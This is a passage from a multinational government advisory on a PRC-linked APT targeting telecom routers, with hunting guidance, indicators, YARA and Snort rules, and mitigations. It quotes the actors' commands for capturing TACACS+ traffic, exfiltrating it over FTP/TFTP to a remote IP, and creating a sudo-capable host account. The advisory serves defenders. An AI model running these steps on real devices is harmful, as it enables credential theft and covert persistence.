| monitor capture mycap start | Start the capture |
| show monitor capture mycap buffer brief | Check status of capture |
| monitor capture mycap export bootflash:tac.pcap | Export PCAP to file, staging for exfiltration |
| copy bootflash:tac.pcap ftp://<domain/service>:*@<IP> | Exfiltration |
| copy bootflash:tac.pcap tftp://<IP>/tac.pcap |
Host-level indicators
If console logging or visibility of remote FTP/TFTP from a network appliance are available, the following host-level indicators may assist with detecting activity:
Capture name: 'mycap' Capture rule: 'match ipv4 protocol tcp any any eq 49' Exported pcap filename: 'tac.pcap'
tftp remote filename: 'tac.pcap' tftp remote IP: [remote IP]
Enabling SSH access to the underlying Linux host on IOS XR
Cisco IOS XR (64-bit) is a Linux-based network operating system built on a Yocto-based Wind River Linux distribution. IOS XR is typically administered via the IOS XR CLI over SSH on port TCP/22 or via console.
The built-in sshd_operns service exposes an additional SSH endpoint on the host Linux. When enabled, it listens on TCP/57722 and provides direct shell access to the host OS. Root logins are not permitted to this service, as only non-root accounts can authenticate.
On IOS XR, sshd_operns is disabled by default and must be explicitly started (e.g., service sshd_operns start). Persistence across reboots requires enabling at init (chkconfig) or equivalent.
In observed intrusions, the APT actors enabled sshd_operns, created a local user, and granted it sudo privileges (e.g., by editing /etc/sudoers or adding a file under /etc/sudoers.d/) to obtain root on the host OS after logging in via TCP/57722.
The commands listed in Table 2 were executed from the host Linux bash shell as root.
| Command | Description |
|---|---|
| service sshd_operns start | Starting the sshd_operns service |
|
useradd cisco password cisco |
Adding a new user |
| sudo vi /etc/sudoers | Adding the new user to sudoers |
| chmod 4755 /usr/bin/sudo | As 4755 is the default permissions for sudo, it is unclear why the actors executed this command |
Threat hunting guidance
The authoring agencies encourage network defenders of critical infrastructure organizations, especially telecommunications organizations, to perform threat hunting, and, when appropriate, incident response activities. If malicious activity is suspected or confirmed, organizations should consider all mandatory reporting requirements to relevant agencies and regulators under applicable laws and regulations, and any additional voluntary reporting to appropriate agencies, such as cybersecurity or law enforcement agencies who can provide incident response guidance and assistance with mitigation. See the Contact information section for additional reporting information.
The malicious activity described in this advisory often involves persistent, long-term access to networks where the APT actors maintain several methods of access. Network defenders should exercise caution when sequencing defensive measures to maximize the chance of achieving full eviction, while remaining compliant with applicable laws, regulations, and guidance on incident response and data breach notifications in their jurisdictions. Where possible, gaining a full understanding of the APT actors’ extent of access into networks followed by simultaneous measures to remove them may be necessary to achieve a complete and lasting eviction. Partial response actions may alert the actors to an ongoing investigation and jeopardize the ability to conduct full eviction. Incident response on one network may also result in the APT actors taking measures to conceal and maintain their access on additional compromised networks, and potentially disrupt broader investigative and operational frameworks already in progress.
The APT actors often take steps to protect their established access, such as compromising mail servers or administrator devices/accounts to monitor for signs that their activity has been detected. Organizations should take steps to protect the details of their threat hunting and incident response from APT actor monitoring activities.
The authoring agencies strongly encourage organizations to conduct the following actions for threat hunting:
Monitor configurations changes
- Pull all configurations for running networking equipment and check for differences with latest authorized versions.
- Review remote access configurations for proper application of ACL and transport protocols. Review ACLs for any unauthorized modifications.
- If SNMP is being used, ensure networking equipment is configured to use SNMPv3 with the appropriate authentication and privacy configurations set, as defined in the User-based Security Model (USM) and the View-based Access Control Model (VACM).
- Verify the authenticity of any configured local accounts and their permission levels.
- Check all routing tables to ensure that all routes are authorized and expected.
- Verify that any PCAP commands configured on networking equipment are authorized.
Monitor virtualized containers
- If networking equipment has the capability to run virtualized containers, ensure that all running virtualized containers are expected and authorized.
- For devices that support Cisco Guest Shell (IOS XE and NX-OS), do not rely on device syslog alone to detect actor activity. Use a combination of device syslog, AAA command accounting, container (Guest Shell) logs, and off-box flow/telemetry.
- Capture lifecycle and CLI activity with AAA accounting (TACACS+/RADIUS) for configuration/exec commands so that enable/disable and entry actions are recorded.
- For IOS XE, hunt for
guestshell enable,guestshell run bash, andguestshell disable. On NX-OS, hunt forguestshell enable,run guestshell, andguestshell destroy. Alert on unexpected use ofchvrf(running commands under a different VRF) and, on NX-OS, use ofdohost(container invoking host CLI).
Monitor network services and tunnels
- Monitor for management services running on non-standard ports (SSH, FTP, etc.).
- Hunt for actor-favored protocol patterns:
- SSH on high non-default ports with 22x22/xxx22 numbering patterns from non-admin source IPs.
- HTTPS/Web UI listeners on non-default high ports (18xxx) reachable from outside the management VRF.
- TCP/57722 (IOS XR
sshd_operns) reachability or flows.- Hunt for TCP/57722 listeners on IOS XR platforms (the host Linux
sshd_opernsservice). Collect flow/telemetry (NetFlow/IPFIX) from the management VRF. Any inbound TCP/57722 should be treated as high-risk if unexpected.
- Hunt for TCP/57722 listeners on IOS XR platforms (the host Linux
- TACACS+ (TCP/49) flows to non-approved IPs or any TACACS+ traffic leaving the management VRF. Correlate with device configuration to detect redirection of TACACS+ servers to APT actor-controlled infrastructure.
- FTP/TFTP flows originating from network devices to unapproved destinations, especially when preceded by on-box PCAP collection activity.
- Audit any tunnel that transits a security boundary, such as peering points between providers, to ensure it can be accounted for by network administrators. In particular, examine:
- Unexplained or unexpected tunnels between Autonomous System Numbers (ASNs).
- Unauthorized use of file transfer protocols, such as FTP and TFTP.
- Monitor network traffic for abnormal volumes of files transfers to internal FTP servers, which the APT actors may use as staging areas prior to data exfiltration.
- Extensive SSH activity against routers, followed by the establishment of both an incoming tunnel and outgoing tunnel—each of which may leverage different protocols.
Monitor firmware and software integrity
- Perform hash verification on firmware and compare values against the vendor's database to detect unauthorized modification to the firmware. Ensure that the firmware version is as expected.
- Compare hashes of images both on disk and in memory against known-good values. Reference the Network Device Integrity (NDI) Methodology or Network Device Integrity (NDI) on Cisco IOS Devices for more information.
- Use the product’s run-time memory validation or integrity verification tool to identify any changes to the run-time firmware image.
- Where supported by the platform, enable image and configuration integrity features, such as signed image enforcement and secure configuration checkpoints. Alert on any boot-time or run-time verification failure.
- Check any available file directories that may exist (flash, non-volatile random-access memory [NVRAM], system, etc.) for non-standard files.
Monitor logs
- Review logs forwarded from network devices for indications of potential malicious behavior, such as:
- Evidence of clearing locally stored logs,
- Disabling log creation or log forwarding,
- Starting a PCAP recording process using available functions,
- Allowing remote access via non-standard methods or to new locations, and
- Changes to configuration of devices via non-standard methods or from unexpected locations.
- Alert on creation/start of any on-box packet capture (e.g.,
monitor capture ... start, Embedded Packet Capture) or SPAN/RSPAN/ERSPAN session definitions, especially those matching TACACS+ (TCP/49) or RADIUS. - Inventory and continuously watch
monitor session ...(SPAN/ERSPAN) and PCAP state. Naming patterns includemycapand output filenames likemycap.pcap,tac.pcap, and1.pcap. - Where supported, deploy embedded event triggers (e.g., EEM on IOS XE/NX-OS) to syslog any invocation of packet-capture or
span/erspanconfiguration commands, capturing the invoking username and source. - Audit for non-root local accounts granted sudo on XR host Linux (e.g., via
/etc/sudoersor/etc/sudoers.d/). Where supported, ensure the host operating system (OS)sshd_opernsservice is disabled and not listening. Validate at each reboot and device upgrade. - Alert on config or telemetry indicating new XR host OS services, changes to systemd service states, or unexpected privilege escalations on the host OS.
- Analyze internal FTP Server logs for any logins from unexpected sources.
- Monitor network traffic for logons from one router to another router, as this should not be typical of normal router administration processes.
If unauthorized activities are discovered, coordinate containment sequencing before disabling to avoid tipping active APT operators. Capture live artifacts (process lists, bound sockets, on-box files), then eradicate.
See the Contact information section of this advisory for response actions that should be taken if malicious activity is confirmed.
Indicators of compromise
IP-based indicators
The following IP indicators were associated with the APT actors’ activity from August 2021 to June 2025. Disclaimer: Several of these observed IP addresses were first observed as early as August 2021 and may no longer be in use by the APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.
| 1.222.84[.]29 | 167.88.173[.]252 | 23.227.202[.]253 | 45.61.151[.]12 |
| 103.169.91[.]231 | 167.88.173[.]58 | 37.120.239[.]52 | 45.61.154[.]130 |
| 103.199.17[.]238 | 167.88.175[.]175 | 38.71.99[.]145 | 45.61.159[.]25 |
| 103.253.40[.]199 | 167.88.175[.]231 | 43.254.132[.]118 | 45.61.165[.]157 |
| 103.7.58[.]162 | 172.86.101[.]123 | 45.125.64[.]195 | 5.181.132[.]95 |
| 104.194.129[.]137 | 172.86.102[.]83 | 45.125.67[.]144 | 59.148.233[.]250 |
| 104.194.147[.]15 | 172.86.106[.]15 | 45.125.67[.]226 | 61.19.148[.]66 |
| 104.194.150[.]26 | 172.86.106[.]234 | 45.146.120[.]210 | 63.141.234[.]109 |
| 104.194.153[.]181 | 172.86.106[.]39 | 45.146.120[.]213 | 63.245.1[.]34 |
| 104.194.154[.]150 | 172.86.108[.]11 | 45.59.118[.]136 | 74.48.78[.]66 |
| 104.194.154[.]222 | 172.86.124[.]235 | 45.59.120[.]171 | 74.48.78[.]116 |
| 107.189.15[.]206 | 172.86.65[.]145 | 45.61.128[.]29 | 74.48.84[.]119 |
| 14.143.247[.]202 | 172.86.70[.]73 | 45.61.132[.]125 | 85.195.89[.]94 |
| 142.171.227[.]16 | 172.86.80[.]15 | 45.61.133[.]157 | 89.117.1[.]147 |
| 144.172.76[.]213 | 190.131.194[.]90 | 45.61.133[.]31 | 89.117.2[.]39 |
| 144.172.79[.]4 | 193.239.86[.]132 | 45.61.133[.]61 | 89.41.26[.]142 |
| 146.70.24[.]144 | 193.239.86[.]146 | 45.61.133[.]77 | 91.231.186[.]227 |
| 146.70.79[.]68 | 193.43.104[.]185 | 45.61.133[.]79 | 91.245.253[.]99 |
| 146.70.79[.]81 | 193.56.255[.]210 | 45.61.134[.]134 | 2001:41d0:700:65dc::f656[:]929f |
| 167.88.164[.]166 | 212.236.17[.]237 | 45.61.134[.]223 | 2a10:1fc0:7::f19c[:]39b3 |
| 167.88.172[.]70 | 23.227.196[.]22 | 45.61.149[.]200 | |
| 167.88.173[.]158 | 23.227.199[.]77 | 45.61.149[.]62 |
Custom SFTP client
The APT actors also use a custom SFTP client, which is a Linux binary written in Golang, to transfer encrypted archives from one location to another.
The following SFTP client binaries in Table 4 through Table 7 are similar in that they are used to transfer files from a compromised network to staging hosts where the files are prepared for exfiltration. However, cmd1 has the additional capability of collecting network packet captures on the compromised network. Note: The cmd3 and cmd1 clients were likely written by the same developer since they have similar build path strings and code structure.
| File Name | cmd3 |
|---|---|
| MD5 Hash | eba9ae70d1b22de67b0eba160a6762d8 |
| SHA 256 Hash | 8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1 |
| File Size (bytes) | 3506176 |
| File Type | ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=rHFK_GWSIG3fShYR02ys/Hou3WF-dO9MYtI232CYr/ D3n2Irn5doNndtloYkEi/r3IcebaH3y02cYer7tm0 stripped |
| Command Line Usage | ./cmd3 <encrypted_configuration_string> |
| Version String | v1.0 |
| Build Path String | C:/work/sync/cmd/cmd3/main.go |
| File Name | cmd1 |
|---|---|
| MD5 Hash | 33e692f435d6cf3c637ba54836c63373 |
| SHA 256 Hash | f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4 |
| File Size (bytes) | 3358720 |
| File Type | ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=N3lepXdViXHdPCh5amSa/LhM5susdTarcmIQEMqku/ eplvxiWNUFNeKXjT-6sd/R-eCtbFZFNozRZqEuwZY stripped |
| Command Line Usage | ./cmd1 <encrypted_configuration_string> |
| Version String | V20240816 |
| Build Path String | C:/work/sync_v1/cmd/cmd1/main.go |
Cmd1 SFTP client Yara rule
rule SALT_TYPHOON_CMD1_SFTP_CLIENT {
meta:
description = "Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting."
strings:
$s1 = "monitor capture CAP"
$s2 = "export ftp://%s:%s@%s%s"
$s3 = "main.CapExport"
$s4 = "main.SftpDownload"
$s5 = ".(*SSHClient).CommandShell"
$aes = "aes.decryptBlockGo"
$buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"
condition:
(uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) or ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe))) and 5 of them
}
| File Name | new2 |
|---|---|
| SHA 256 Hash | da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e |
| File Type | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped |
New2 SFTP client Yara rule
rule SALT_TYPHOON_NEW2_SFTP_CLIENT {
meta:
description = "Detects the Salt Typhoon New2 SFTP client. Rule is meant for threat hunting."
strings:
$set_1_1 = "invoke_shell"
$set_1_2 = "execute_commands"
$set_1_3 = "cmd_file"
$set_1_4 = "stop_event"
$set_1_5 = "decrypt_message"
$set_2_1 = "COMMANDS_FILE"
$set_2_2 = "RUN_TIME"
$set_2_3 = "LOG_FILE"
$set_2_4 = "ENCRYPTION_PASSWORD"
$set_2_5 = "FIREWALL_ADDRESS"
$set_3_1 = "commands.log"
$set_3_2 = "Executing command: {}"
$set_3_3 = "Connecting to: {}"
$set_3_4 = "Network sniffer script."
$set_3_5 = "tar -czvf - {0} | openssl des3 -salt -k password -out {0}.tar.gz"
$set_required = { 00 70 61 72 61 6D 69 6B 6F }
condition:
$set_required and 4 of ($set_1_*) and 4 of ($set_2_*) and 4 of ($set_3_*)
}
| File Name | sft |
|---|---|
| SHA 256 Hash | a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe |
| File Type | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=Q_mmdNzBVit4XSJyGrtd/ampmN-03i9bT1qzD9njH/MFeCrtuGl37O7UNKFQyk/sBN-cduKnfSAvXO7jzGG, with debug_info, not stripped |
CVE 2023-20198 Snort rule
alert tcp any any -> any $HTTP_PORTS (msg:"Potential CVE-2023-20198 exploit attempt - HTTP Request to Add Privilege 15 User Detected"; content:"POST"; http_method; pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/i"; http_uri; content:"<request xmlns=\"urn:cisco:wsma-config\" correlator=\"execl\">"; http_client_body; content:"<configApply details=\"all\">"; http_client_body; content:"<config-data>"; http_client_body; content:"<cli-config-data-block>"; http_client_body; content:"username"; http_client_body; content:"privilege 15"; http_client_body; content:"secret"; http_client_body; sid:1000003; rev:1;)
Mitigations
These APT actors are having considerable success using publicly known CVEs to gain access to networks, so organizations are strongly encouraged to prioritize patching in a way that is proportionate to this threat, such as by sequencing patches to address the highest risks first. See CISA’s Known Exploited Vulnerabilities Catalog for further information. Specifically, organizations should ensure edge devices are not vulnerable to known exploited CVEs identified in this advisory.
Note: This advisory uses MITRE D3FEND™, version 1.2.0, cybersecurity countermeasures. See the Appendix C: MITRE D3FEND Countermeasures section of this advisory for a table of the mitigations mapped to MITRE D3FEND countermeasures.
General recommendations
- Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for the activities listed in this advisory [D3-PM]. In particular, check for:
- Unexpected GRE or other tunneling protocols, especially with foreign infrastructure [D3-NTCD].
- Unexpected external IPs set as a TACACS+ or RADIUS server, or other AAA service configuration modifications.
- Unexpected external IPs in ACLs.
- Unexpected packet capture or network traffic mirroring settings.
- Unexpected virtual containers running on network devices, or, where virtual containers are expected, unexpected commands within the containers.
- Employ a robust change management process that includes periodic auditing of device configurations [D3-PM].
- Ensure all networking configurations are stored, tracked, and regularly audited via a change management process. A change management process audits approved configurations against what is currently running in an organization’s infrastructure.
- Review firewall rule creation and modification dates, cross referencing against change management approvals, to detect unauthorized rules or rule changes.
- Create alarms or alerts for unusual router administration access, commands, or other activity.
- Attempt to identify the full scope of a suspected compromise before mitigating. While it is important to contain the intrusion and prevent further malicious activity, if the full scope is not identified and mitigated fully, the actors may retain access and cause further malicious activity. Threat hunting and incident response efforts should be balanced against the total potential malicious activity with the goals of full eviction and minimizing damage.
- An established compromise by these APT actors will likely include recurring, large-scale exfiltration from the compromised network. In at least one instance, the APT actors utilized GRE and MPLS tunnels to move data back to China.
- Disable outbound connections from management interfaces to limit possible lateral movement activity between network devices [D3-OTF].
- Disable all unused ports and protocols (both traffic and management protocols) [D3-ACH]. Only use encrypted and authenticated management protocols (e.g., SSH, SFTP/SCP, HTTPS) and disable all others, especially unencrypted protocols (e.g., Telnet, FTP, HTTP).
- Change all default administrative credentials, especially for network appliances and other network devices [D3-CFP].
- Require public-key authentication for administrative roles. Disable password authentication where operationally feasible. Minimize authentication attempts and lockout windows to slow brute force and sprayed attempts [D3-CH].
- Use the vendor recommended version of the network device operating system and keep it updated with all patches. Upgrade unsupported network devices to ones that are supported by the vendor with security updates [D3-SU].
Hardening management protocols and services
- Implement management-plane isolation and control-plane policing (CoPP) [D3-NI].
- Place all device management services (SSH, HTTPS, SNMP, TACACS+/RADIUS, SCP/SFTP) strictly in a dedicated out-of-band management network or a management VRF.
- Ensure this management VRF has no route leakage to customers or peering VRFs and cannot initiate or receive sessions from data-plane or peering address space [D3-ITF].
- Block all egress from the management VRF except to explicitly authorized AAA/syslog/NetFlow/IPFIX/telemetry collectors to prevent actor use of management interfaces as lateral movement conduits or exfiltration paths.
- Apply explicit management-plane ACLs at the control plane (e.g., CoPP/CPPr) to allowlist (i.e., default-deny) and rate-limit management protocols. Allow only approved management station IPs/subnets and jump servers.
- Apply these restrictions to all SNMP, TACACS+/RADIUS (TCP/UDP 49/1812/1813), HTTPS (TCP/443 and any configured non-default port), SSH (TCP/22 and any configured non-default port), and SFTP/SCP.
- For devices that do not support ACLs, place on a separate management Virtual Local Area Network (VLAN); an ACL can be applied to this management VLAN from an upstream device, such as a router or Layer 3 switch.
- Use SSHv2 only and disable Telnet. Audit and restrict SSH on non-default ports (e.g., 22x22 and xxx22 patterns) commonly used by the APT actors.
- If a web interface is operationally required, bind it only to the management VRF/interface. Use HTTPS only and disable unencrypted HTTP. Require AAA for web interface access. Monitor and alert on non-default high HTTPS ports (e.g., 18xxx) observed in intrusions.
- Use SNMPv3 only, and disable SNMPv1 and SNMPv2. Configure Trusted Managers and ACLs to limit SNMP access to only trusted devices.
- Change all weak and default SNMP community strings.
- Restrict and monitor SNMP writes.
- Enforce SNMPv3 with authPriv and apply VACM views that exclude configuration-altering MIB objects from write access. Only grant read access for required OIDs; reserve write access for tightly scoped automation accounts from approved managers.
- Continuously monitor SNMP SET operations and alert on changes to AAA servers, HTTP/HTTPS enablement or port changes, tunnel interfaces, SPAN/ERSPAN sessions, and routing and ACL objects. Actor tradecraft includes issuing SNMP SETs to make covert configuration changes at scale.
- Configure only strong cryptographic cipher suites for all management protocols (e.g., SSH, SFTP, HTTPS) and reject all weak ones.
- Enforce per-protocol rate limits (particularly for SSH, HTTPS, SNMP, TACACS+/RADIUS) to blunt credential-guessing and slow “low-and-slow" abuse of built-in functions (e.g., Embedded Packet Capture, tunnel setup) without denying legitimate admin access.
- Eliminate unintended IPv6 management exposure.
- If IPv6 is enabled, apply equivalent controls for IPv6 as for IPv4.
- Enforce management-plane ACLs and CoPP for IPv6. Bind management services only to the management VRF/interface in IPv6.
- Audit for IPv6-reachable management services and tunnels, as the APT actors’ infrastructure includes IPv6 addresses.
Implementing robust logging
- Ensure logging is enabled and forwarded to a centralized server. Set the trap and buffer logging levels on each device to at least syslog level “informational” (code 6) to collect all necessary information.
- Ensure all logs sent to a centralized logging server are transmitted via a secure, authenticated, and encrypted channel (such as IPsec, TLS, or SSH tunnels). The central server should maintain immutable logs with retention periods sufficient to support cybersecurity incident response investigations and comply with applicable retention policies.
- Enable AAA command accounting for privileged commands to record any attempts to invoke those commands.
Routing best practices
- Utilize routing authentication mechanisms, when possible.
- Protect peering and edge routing paths often abused for covert redirection.
- Continuously validate static routes, policy-based routing (PBR), and VRF-leak policies at peering edges. Alert on additions that steer traffic toward non-standard GRE/IPsec endpoints or unexpected next hops.
- Enforce maximum-prefix limits, strict prefix/AS-path filtering, and “only-expected” communities on all external BGP (eBGP) sessions. Deny default and overly broad routes.
- Enable TTL security (GTSM) or equivalent for eBGP to reduce off-path attack surface.
- Require session protection (TCP-AO where supported, otherwise MD5) and monitor for BGP session resets and parameter changes from unexpected management origins.
Virtual Private Network (VPN) best practices
- Delete default VPN Internet Key Exchange (IKE) policies and associated components.
- Create IKE policies consistent with applicable requirements and guidance on cryptographic algorithm use. For U.S. National Security Systems, follow Committee on National Security Systems Policy (CNSSP) 15 and other applicable policies:
- Diffie-Hellman Group: 16 with 4096 bit Modular Exponential (MODP)
- Diffie-Hellman Group: 20 with 384 bit Elliptic Curve Group (ECP)
- Encryption: AES-256
- Hashing: SHA-384
Cisco-specific recommendations
- Disable the Cisco Smart Install feature.
- Store credentials using strong cryptography.
- Protect local credentials on Cisco networking devices using Type 8 (PBKDF2-SHA-256) where supported. Do not use Type 7 and transition from Type 5 (MD5) when possible.
- Use Type 6 (AES) key encryption to protect stored secrets (e.g., TACACS+/RADIUS shared secrets or IKE PSKs).
- Disable outbound connections from the VTYs (e.g.,
transport output none). This prevents initiating SSH, Telnet, or other client sessions from the device via VTY, reducing its utility as a jump host. Monitor for any changes to this setting. - Audit for unexpected enablement of IOS XR host SSH (
sshd_operns) on TCP/57722. This is disabled by default, but has been observed being enabled by actors for persistence. - When not required, disable the web configuration interface on applicable Cisco networking devices by running
no ip http serverandno ip http secure-server.- If management via a web interface is required, ensure to enable only the HTTPS management interface by running the command
ip http secure-serverand keepno ip http serverconfigured to prevent unencrypted access via HTTP.
- If management via a web interface is required, ensure to enable only the HTTPS management interface by running the command
- Ensure a final
deny any any logline is added to all configured ACLs. This ensures that the denied connections are logged so they could be reviewed at a later date.
Mitigating Guest Shell abuse
- Disable Guest Shell where not operationally required.
- For IOS XE, run
guestshell disableto stop the container. Where supported, disable the IOx subsystem withno ioxto prevent container hosting entirely. Confirm withshow guestshell / show iox. - For NX-OS, run
guestshell disableto stop the container. Useguestshell destroyto uninstall it and return resources to the system. Confirm withshow guestshell.
- For IOS XE, run
- Where Guest Shell is disabled, restrict (re)enabling Guest Shell.
- Enforce AAA command authorization (TACACS+/RADIUS) so only approved roles can run
guestshell enable,guestshell run bash(IOS XE),run guestshell(NX-OS),guestshell disable/destroy,chvrf,dohost, or IOx-related commands.
- Enforce AAA command authorization (TACACS+/RADIUS) so only approved roles can run
- Where Guest Shell is used:
- Forward container logs (e.g., journald/systemd inside Guest Shell) to your SIEM. Device syslog does not capture process activity inside the container by default.
- Configure the VRF used by Guest Shell (management VRF on IOS XE; default VRF on NX-OS unless
chvrfis used). Restrict egress to only required destinations (e.g., SIEM/AAA/telemetry collectors) with ACLs. - Perform periodic inventories and integrity checks of device storage (e.g.,
bootflash:) to detect unexpected files created from the container. - Create alerts for
guestshell disable/ guestshell destroyand unexpectedchvrf/dohostusage. Consider Cisco Embedded Event Manager (EEM) policies that snapshot state (running processes, container filesystem, storage listings) when these events occur.
Additional Cisco resources:
- Cisco Software Checker: Resource to find if any known vulnerabilities affect a version of IOS that may be currently in use.
- Cisco IOS Hardening Guide: Resource for IOS devices.
- Cisco IOS XE Hardening Guide: Resource for IOS XE devices.
- Cisco Forensic Guides: Resources to verify the integrity of affected devices.
- Guide to Securing NX-OS Software Devices: Resource if using applicable devices.
Resources
Additional information can be found in the following publicly available guidance.
United States resources
- (NSA, CISA, FBI) PRC State-Sponsored Cyber Actors Exploit Network Providers and Devices (Note: The Telecommunications and Network Service Provider Targeting section begins on page 4. Those TTPs, router commands, and mitigations are relevant for the activity listed in this advisory.)
- (CISA, NSA, FBI) Enhanced Visibility and Hardening Guidance for Communications Infrastructure
- (NSA) Cisco Password Types: Best Practices
- (NSA) Cisco Smart Install Protocol Misuse
- (NSA) Performing Out-of-Band Network Management
- (NSA) Network Infrastructure Security Guide
- (CISA) Mobile Communications Best Practice Guidance
United Kingdom resources
- (Legislation) Telecommunications Security Act (2021)
- (Technical Guidance) Telecommunications Security Act (2021) Code of Practice
- (NCSC Guidance) Cyber Assessment Framework
- (NCSC Guidance) Guidance on using IPsec to protect data
- (NCSC Guidance) Principles for secure privileged access workstations (PAWS)
- (Ofcom Guidance) Telecoms industry guidance
International resources
- (Technical Specification) ETSI Privileged Access Workstations: Part 1: Physical [TS 103 994-1]
- (Technical Specification) ETSI Privileged Access Workstations: Part 2: Connectivity [TS 103 994-2]
Acknowledgements
The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Cisco Security & Trust, Cisco Talos, Crowdstrike, Google Mandiant, Google Threat Intelligence, Greynoise, Microsoft, PwC Threat Intelligence, and additional industry partners for their contribution to this advisory.
Version History
27 August 2025, v1.0: Initial publication
3 September 2025, v1.1: Japan NCO name correction, added introduction in Technical details, update in Initial access to clarify example CVEs’ ordering, one IP correction and two removals.
Disclaimer of endorsement
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Contact information
The following contacts are non-exhaustive, and organizations should follow all applicable reporting requirements for a given incident or other event.
United States organizations
- National Security Agency (NSA)
- Cybersecurity Report Feedback: CybersecurityReports@nsa.gov
- Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
- Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov
- Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)
- U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center (contact@mail.cisa.dhs.gov, 888-282-0870, or reporting online at cisa.gov/report), or your local FBI field office.
- Methods for initial access are a critical information gap for parties working to understand the scope, scale, and impact of these APT actors. When available, please include the following information regarding the incident:
- Type of activity and types of equipment affected by or used in the activity;
- APT actors’ tactics, techniques, and procedures (TTPs) used to conduct initial access and/or lateral movement;
- Exfiltration infrastructure and associated techniques (Layer 2/Layer 3);
- Passwords and associated techniques used to encrypt exfiltrated data;
- Likely or confirmed compromised routing equipment connected to or used by government networks;
- Insights into how the compromised devices are tasked (i.e., how is traffic of interest selected for collection/redirection);
- Signs of compromise or persistence beyond the specific network devices themselves (e.g., additional targets, such as network operations staff, IT/corporate email, etc.).
- Date, time, and location of the incident;
- Number of people affected;
- Name of the submitting company or organization; and
- Designated point of contact.
- Department of Defense Cyber Crime Center (DC3)
- Defense Industrial Base Inquiries and Cybersecurity Services: DC3.DCISE@us.af.mil
- Media Inquiries / Press Desk: DC3.Information@us.af.mil
Australian organizations
- Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
Canadian organizations
- Report incidents by emailing CCCS at contact@cyber.gc.ca.
- Canadian Security Intelligence Service (CSIS) Media Inquiries / Press Desk: media-medias@smtp.gc.ca
New Zealand organizations
- New Zealand National Cyber Security Centre (NCSC-NZ): info@ncsc.govt.nz.
United Kingdom organizations
- UK National Cyber Security Centre (NCSC)
- The NCSC—a part of intelligence, security, and cyber agency GCHQ—is the UK’s technical authority on cyber security. UK organizations should report significant cyber security incidents via https://report.ncsc.gov.uk/ (monitored 24/7).
- Ofcom
- Ofcom is the UK’s communications regulator and is responsible for enforcing the telecoms security provisions in the Communications Act (2003) and the Telecommunications Security Act (2021). Guidance and contact information on standards, specifications, and other requirements for the UK telecoms industry can be found at https://www.ofcom.org.uk.
- For general inquiries: networksecurityenquiries@ofcom.org.uk
- For incident reports: incident@ofcom.org.uk
Czech Republic organizations
- National Cyber and Information Security Agency (NÚKIB): cert.incident@nukib.gov.cz.
Finnish organizations
- Finnish Security and Intelligence Service (SUPO): https://supo.fi/en/contact
Germany organizations
- Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30, pressestelle@bnd.bund.de
- BfV Prevention/Economic Protection Unit: +49 30 18792-3322, wirtschaftsschutz@bfv.bund.de
- BSI Service-Center: +49 800 274 1000, service-center@bsi.bund.de
Italian organizations
- Italian External Intelligence and Security Agency (AISE): Visit https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aise.
- Italian Internal Intelligence and Security Agency (AISI): Visit https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aisi.
Japanese organizations
- National Cybersecurity Office (NCO): first-team@cyber.go.jp
Polish organizations
- Polish Foreign Intelligence Agency (AW): CTIteam@aw.gov.pl
- Polish Military Counterintelligence Service (SKW): cyber.int@skw.gov.pl
Appendix A: MITRE ATT&CK tactics and techniques
See Table 8 through Table 20 for all the threat actor tactics and techniques referenced in this advisory.
| Technique Title | ID | Use |
|---|---|---|
| Active Scanning | T1595 | Actively scan for open ports and services |
| Gather Victim Network Information: Network Topology | T1590.004 | Leverage configuration files from exploited devices to gather the network topology information |
| Technique Title | ID | Use |
|---|---|---|
| Acquire Infrastructure: Virtual Private Servers | T1583.003 | Leverage VPS as infrastructure |
| Compromise Infrastructure: Network Devices | T1584.008 | Compromise intermediate routers |
| Obtain Capabilities: Exploits | T1588.005 | Utilize publicly available code (siet.py) to exploit vulnerable devices |
| Obtain Capabilities: Tool | T1588.002 | Utilize publicly available tooling (e.g., map.tcl, tclproxy.tcl, wodSSHServer) |
| Technique Title | ID | Use |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Exploit publicly known CVEs |
